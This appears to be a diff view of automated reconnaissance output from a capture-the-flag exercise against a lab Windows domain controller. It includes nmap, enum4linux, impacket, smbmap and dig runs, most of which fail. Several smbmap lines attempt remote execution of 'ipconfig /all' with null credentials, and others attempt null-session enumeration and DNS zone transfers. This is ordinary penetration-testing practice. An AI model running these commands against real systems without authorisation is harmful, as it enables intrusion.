SCAN(V=7.93%E=4%D=10/28%OT=%CT=%CU=%PV=Y%DS=10%DC=T%G=N%TM=653CFB56%P=x86_64-pc-linux-gnu)
SEQ(II=I)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 10 hops
Host script results:
|_clock-skew: 1h00m07s
TRACEROUTE (using port 53/udp)
HOP RTT ADDRESS
1 36.79 ms 10.10.14.1
2 ... 9
10 35.90 ms 10.129.243.131
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 14:15:18 2023 -- 1 IP address (1 host up) scanned in 1812.34 seconds
```

81
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top TCP Ports.md Normal file
View File

@@ -0,0 +1,81 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131
Increasing send delay for 10.129.243.131 from 0 to 5 due to 11 out of 20 dropped probes since last increase.
Nmap scan report for 10.129.243.131
Host is up, received user-set (0.14s latency).
Scanned at 2023-10-28 13:45:20 CEST for 264s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Slandovia Energy
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:47:30Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=653CF558%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=109%TI=RD%TS=U)
OPS(O1=M550NW8NNS%O2=M550NW8NNS%O3=M550NW8%O4=M550NW8NNS%O5=M550NW8NNS%O6=M550NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M550NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
IE(R=N)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 59m57s
| smb2-time:
| date: 2023-10-28T12:49:11
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25314/tcp): CLEAN (Timeout)
| Check 2 (port 10793/tcp): CLEAN (Timeout)
| Check 3 (port 25536/udp): CLEAN (Timeout)
| Check 4 (port 25523/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 191.57 ms 10.10.14.1
2 183.81 ms 10.129.243.131
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:44 2023 -- 1 IP address (1 host up) scanned in 278.93 seconds
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/Nmap MSRPC.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 135 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:47 CEST for 1s
PORT STATE SERVICE REASON VERSION
135/tcp filtered msrpc no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:48 2023 -- 1 IP address (1 host up) scanned in 3.66 seconds
```

15
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/get-arch.md Normal file
View File

@@ -0,0 +1,15 @@
```bash
impacket-getArch -target 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_architecture.txt):
```
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
[-] 10.129.243.131: Could not connect: timed out
```

15
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-135-msrpc/rpcdump.md Normal file
View File

@@ -0,0 +1,15 @@
```bash
impacket-rpcdump -port 135 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_rpcdump.txt):
```
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Retrieving endpoint list from 10.129.243.131
[-] Protocol failed: Could not connect: timed out
[*] No endpoints found.
```

148
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Enum4Linux.md Normal file
View File

@@ -0,0 +1,148 @@
```bash
enum4linux -a -M -l -d 10.129.243.131 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt):
```
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 13:49:45 2023
 =========================================( Target Information )=========================================
Target ........... 10.129.243.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )===========================

[E] Can't find workgroup/domain

 ===============================( Nbtstat Information for 10.129.243.131 )===============================
Looking up status of 10.129.243.131
No reply from 10.129.243.131
 ==================================( Session Check on 10.129.243.131 )==================================

[+] Server 10.129.243.131 allows sessions using username '', password ''

 ==========================( Getting information via LDAP for 10.129.243.131 )==========================

[+] 10.129.243.131 appears to be a child DC

 ===============================( Getting domain SID for 10.129.243.131 )===============================
Domain Name: MEGACORP
Domain Sid: S-1-5-21-855300830-391258870-456067225

[+] Host is part of a domain (not a workgroup)

 ==================================( OS information on 10.129.243.131 )==================================

[E] Can't get OS info with smbclient

[+] Got OS info for 10.129.243.131 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
 ======================================( Users on 10.129.243.131 )======================================

[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED


[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ===============================( Machine Enumeration on 10.129.243.131 )===============================

[E] Not implemented in this version of enum4linux.

 ================================( Share Enumeration on 10.129.243.131 )================================
do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.129.243.131

 ===========================( Password Policy Information for 10.129.243.131 )===========================

[E] Unexpected error from polenum:

[+] Attaching to 10.129.243.131 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.243.131)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[E] Failed to get password policy with rpcclient

 ======================================( Groups on 10.129.243.131 )======================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )=================

[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

 ==============================( Getting printer info for 10.129.243.131 )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Oct 28 13:50:18 2023
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/Nmap SMB.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:47 CEST for 2s
PORT STATE SERVICE REASON VERSION
139/tcp filtered netbios-ssn no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.71 seconds
```

11
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBClient.md Normal file
View File

@@ -0,0 +1,11 @@
```bash
smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt):
```
do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_IO_TIMEOUT)
```

66
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/SMBMap.md Normal file
View File

@@ -0,0 +1,66 @@
```bash
smbmap -H 10.129.243.131 -P 139 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -H 10.129.243.131 -P 139 -R 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt):
```
[!] 445 not open on 10.129.243.131....
```

12
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-139-netbios-ssn/nbtscan.md Normal file
View File

@@ -0,0 +1,12 @@
```bash
nbtscan -rvh 10.129.243.131 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt):
```
Doing NBT name scan for addresses from 10.129.243.131
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-3268-ldap/Nmap LDAP.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:48 CEST for 1s
PORT STATE SERVICE REASON VERSION
3268/tcp filtered globalcatLDAP no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.69 seconds
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-389-ldap/Nmap LDAP.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 389 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:48 CEST for 1s
PORT STATE SERVICE REASON VERSION
389/tcp filtered ldap no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.72 seconds
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/Nmap SMB.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 445 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:47 CEST for 2s
PORT STATE SERVICE REASON VERSION
445/tcp filtered microsoft-ds no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.64 seconds
```

66
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-445-microsoft-ds/SMBMap.md Normal file
View File

@@ -0,0 +1,66 @@
```bash
smbmap -H 10.129.243.131 -P 445 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-share-permissions.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -H 10.129.243.131 -P 445 -R 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-list-contents.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt):
```
[!] 445 not open on 10.129.243.131....
```
```bash
smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/smbmap-execute-command.txt):
```
[!] 445 not open on 10.129.243.131....
```

20
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-464-kpasswd5/Nmap Kerberos.md Normal file
View File

@@ -0,0 +1,20 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:46 2023 as: nmap -vv --reason -Pn -T4 -sV -p 464 --script=banner,krb5-enum-users -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:47 CEST for 1s
PORT STATE SERVICE REASON VERSION
464/tcp filtered kpasswd5 no-response
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.44 seconds
```

18
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Reverse Lookup.md Normal file
View File

@@ -0,0 +1,18 @@
```bash
dig -p 53 -x 10.129.243.131 @10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_reverse-lookup.txt):
```
;; communications error to 10.129.243.131#53: timed out
;; communications error to 10.129.243.131#53: timed out
;; communications error to 10.129.243.131#53: timed out
; <<>> DiG 9.18.11-2-Debian <<>> -p 53 -x 10.129.243.131 @10.129.243.131
;; global options: +cmd
;; no servers could be reached
```

19
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/DNS Zone Transfer.md Normal file
View File

@@ -0,0 +1,19 @@
```bash
dig AXFR -p 53 @10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_zone-transfer.txt):
```
;; communications error to 10.129.243.131#53: timed out
;; communications error to 10.129.243.131#53: timed out
;; communications error to 10.129.243.131#53: timed out
; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```

23
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - tcp-53-domain/Nmap DNS.md Normal file
View File

@@ -0,0 +1,23 @@
```bash
nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:49:45 2023 as: nmap -vv --reason -Pn -T4 -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set.
Scanned at 2023-10-28 13:49:47 CEST for 2s
PORT STATE SERVICE REASON VERSION
53/tcp filtered domain no-response
Host script results:
|_dns-brute: Can't guess domain of "10.129.243.131"; use dns-brute.domain script argument.
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:49:49 2023 -- 1 IP address (1 host up) scanned in 3.81 seconds
```

15
